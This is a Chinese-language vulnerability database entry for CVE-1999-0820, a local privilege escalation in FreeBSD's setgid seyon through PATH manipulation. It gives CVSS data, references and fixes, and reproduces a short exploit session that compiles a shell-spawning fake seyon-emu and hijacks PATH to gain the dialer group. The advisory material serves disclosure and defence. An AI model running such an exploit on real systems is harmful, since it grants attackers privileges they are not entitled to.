CVE-1999-0820
CVSS4.6
发布时间 :1999-12-01 00:00:00
修订时间 :2008-09-09 08:35:41
NMCOES    

[原文]FreeBSD seyon allows users to gain privileges via a modified PATH variable for finding the xterm and seyon-emu commands.


[CNNVD]FreeBSD Seyon设置组标识符拨号装置漏洞(CNNVD-199912-012)

        FreeBSD的seyon存在漏洞。用户可以通过修改查找xterm和seyon-emu命令的PATH变量获得权限。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0820
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0820
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199912-012
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/838
(UNKNOWN)  BID  838
http://www.osvdb.org/5996
(UNKNOWN)  OSVDB  5996

- 漏洞信息

FreeBSD Seyon设置组标识符拨号装置漏洞
中危 配置错误
1999-12-01 00:00:00 2005-05-02 00:00:00
本地  
        FreeBSD的seyon存在漏洞。用户可以通过修改查找xterm和seyon-emu命令的PATH变量获得权限。

- 公告与补丁

        Remove the setgid bit from seyon.

- 漏洞信息 (19609)

Muhammad M. Saggaf Seyon 2.14 b Relative Path Vulnerability (EDBID:19609)
freebsd local
1999-11-08 Verified
0 Shawn Hillis
N/A [点击下载]
source: http://www.securityfocus.com/bid/780/info

Seyon uses relative pathnames to spawn two other programs which it requires. It is possible to exploit this vulnerability to obtain the priviliges which seyon runs with. It is installed (by default) setgid dialer on FreeBSD and root on Irix. 

bash-2.03$ uname -a; id; ls -la `which seyon`
FreeBSD 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999=
=

jkh@highwing.cdrom.com:/usr/src/sys/compile/GENERIC i386
uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
-rwxr-sr-x 1 bin dialer 88480 Sep 11 00:55 /usr/X11R6/bin/seyon
bash-2.03$ cat > seyonx.c
void main () {
setregid(getegid(), getegid());
system("/usr/local/bin/bash");
}
bash-2.03$ gcc -o seyon-emu seyonx.c
bash-2.03$ PATH=.:$PATH
bash-2.03$ seyon
bash-2.03$ id
uid=1000(xnec) gid=68(dialer) groups=68(dialer), 1000(xnec)
bash-2.03$


		

- 漏洞信息

5996
FreeBSD seyon PATH Variable Subversion Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

FreeBSD contains the port seyon, which is flawed and may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a malicious user places a fake "seyon-emu" or "xterm" in a newly created directory and sets its PATH. Envoking seyon will cause seyon to search the value in $PATH for "xterm" and "seyon-emu" and once it locates either one, the fake will be executed by seyon with seyon privileges. This flaw may lead to a loss of integrity.

- 时间线

1999-11-08 Unknow
1999-11-08 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: chmod 750 `which seyon` and add selected users to the "dialer" group.

- 相关参考

- 漏洞作者

- 漏洞信息

FreeBSD Seyon setgid dialer Vulnerability
Configuration Error 838
No Yes
1999-12-01 12:00:00 2009-07-11 12:56:00
First posted to BugTraq by Brock Tellier <btellier@usa.net> on December 1, 1999.

- 受影响的程序版本

FreeBSD FreeBSD 3.3

- 漏洞讨论

FreeBSD 3.3-RELEASE ships with Seyon, a communications program which is known to have several vulnerabilities which can allow for a malicious user to elevate priviliges. The vulnerability, however, is that seyon is still installed setgid dialer in FreeBSD. When seyon is exploited, a local user can grant him/herself priviliges which allow access to the communications devices or anything else accessable by the group dialer.

- 漏洞利用

One of the methods to exploit seyon is shown below:

bash-2.03$ echo 'void main() { system("/usr/bin/id"); }' &gt; id.c
bash-2.03$ gcc -o id id.c
bash-2.03$ seyon -emulator ./id
uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer), 1000(xnec)

- 解决方案

Remove the setgid bit from seyon.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站